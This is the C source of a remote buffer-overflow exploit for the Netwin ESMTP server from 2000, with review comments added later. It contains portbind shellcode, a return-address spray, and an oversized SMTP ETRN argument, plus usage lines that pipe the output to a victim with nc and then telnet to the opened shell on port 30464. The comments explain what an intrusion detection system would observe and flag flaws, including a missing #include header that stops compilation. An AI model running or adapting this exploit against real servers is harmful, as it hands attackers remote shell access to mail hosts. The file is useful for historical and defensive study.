/*
 * Netwin ESMTP Server v2.7q linux x86 remote exploit
 * funkySh 05/06/2000 (Taeho Oh portbind shell)
 * hello to b0f, #hax
 *
 * [ AAA ][ RET ][ NOP ][ SHELL ]
 * $ (./dmx [offset] ; cat ) | nc victim 25
 * $ telnet victim 30464
 *
 * (tested on RH6.1)
 *
 * Reviewer notes (for analysis of this historical proof-of-concept):
 *  - The whole program just prints two SMTP commands to stdout; the
 *    second one carries an ~1100-byte ETRN argument (see main()).  That
 *    argument is what a mail server, proxy or IDS would observe: a very
 *    long ETRN parameter dominated by repeated 0x41 / 0x90 bytes followed
 *    by non-printable bytes.  Ordinary ETRN arguments are short hostnames.
 *  - The header line above documents the stack layout the author assumed
 *    (A padding, return address, NOP sled, shellcode); only the layout
 *    that the code below actually writes is described in its comments.
 *  - The header name on the #include line was lost when this listing was
 *    extracted (most likely an HTML <...> token); the file does not compile
 *    as it stands.
 */
#include /* NOTE(review): header name missing in the extracted listing */

/*
 * Position-independent x86 Linux payload, invoked via int 0x80 (\xcd\x80)
 * system calls.  What is visible in the bytes themselves: repeated
 * socketcall-style sequences (mov al,0x66 / int 0x80), the ASCII bytes
 * "/bin" (\x2f\x62\x69\x6e) and "/sh/" (\x2f\x73\x68\x2f) being stored to
 * memory, an execve-style call (mov al,0x0b / int 0x80) and a final
 * exit (mov al,0x01 / int 0x80).  The header's "telnet victim 30464"
 * matches the single port byte 0x77 stored into the sockaddr (0x7700 ==
 * 30464), so the port is presumably hard-coded there - confirm by
 * disassembling if exact semantics matter.  The payload contains no NUL
 * byte, which is why strlen() is used as its length below.
 */
char code[]=
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

#define BUFFER 1100          /* total length of the ETRN argument sent */
#define A_BUFF 250           /* leading bytes overwritten with 0x41 ('A') */
#define RET_ADDR 0xbfffca74  /* guessed stack address for RH6.1; shifted by argv[1] */
#define ALIGN 0              /* byte offset at which the address copies start */

/* Never NUL-terminated explicitly: BUFFER is a global, so the tail past the
 * copied payload stays 0x90 and only the zero-initialised byte... is absent.
 * NOTE(review): buf has no terminator at all - printf("%s") relies on
 * whatever follows this global in .bss being zero; fragile but that is how
 * the original behaves. */
char buf[BUFFER];

/*
 * Build the oversized ETRN argument and emit an SMTP dialogue on stdout.
 *
 * argv[1] (optional): signed decimal offset added to RET_ADDR.  Parsed with
 * atoi(), so malformed input silently becomes 0.
 *
 * Layout actually written by this function, by byte offset into buf:
 *   [0, 250)      0x41 padding (A_BUFF)
 *   [240, 350)    the 32-bit address repeated every 4 bytes (note this
 *                 overlaps the last 10 bytes of the 0x41 region)
 *   [250, 880)    0x90 (NOP) filler left over from the first memset
 *   [880, 880+len(code))  the payload
 *   [.., 1100)    0x90 filler
 *
 * Returns: nothing meaningful - main() reaches its closing brace without a
 * return statement, so the exit status is unspecified under C89.
 */
int main(int argc, char * argv[])
{
    int i, offset = 0;
    long address;

    if(argc > 1) offset = atoi(argv[1]);
    address = RET_ADDR + offset;

    /* Fill everything with NOPs first, then overwrite the head with 'A's. */
    memset(buf,0x90,BUFFER);
    memset(buf,0x41,A_BUFF);

    /* Spray the chosen address on 4-byte boundaries inside [240, 350).
     * NOTE(review): the cast to (int *) stores a long into an int slot and
     * type-puns through a char array - works on 32-bit x86, but it is
     * strict-aliasing UB and would silently truncate on LP64 targets. */
    for(i=240+ALIGN;i<350;i+=4) *(int *)&buf[i]=address;

    /* Place the payload near the end; strlen() stops at the first NUL,
     * which the payload above does not contain. */
    memcpy(buf+880,code,strlen(code));

    /* Diagnostics go to stderr so stdout carries only the SMTP commands.
     * NOTE(review): "%x" with a long argument is a format/type mismatch;
     * harmless on ILP32 but technically undefined. */
    fprintf(stderr,"Using: 0x%x\n", address);

    /* The dialogue as a server/IDS would see it: a HELO, then an ETRN whose
     * argument is the ~1100-byte buffer.  The stray 0 argument to the first
     * printf is ignored (no matching conversion). */
    printf("HELO dupa\n",0);
    printf("ETRN %s\n", buf);

    fprintf(stderr,"Now try to telnet victim:30464\n");
}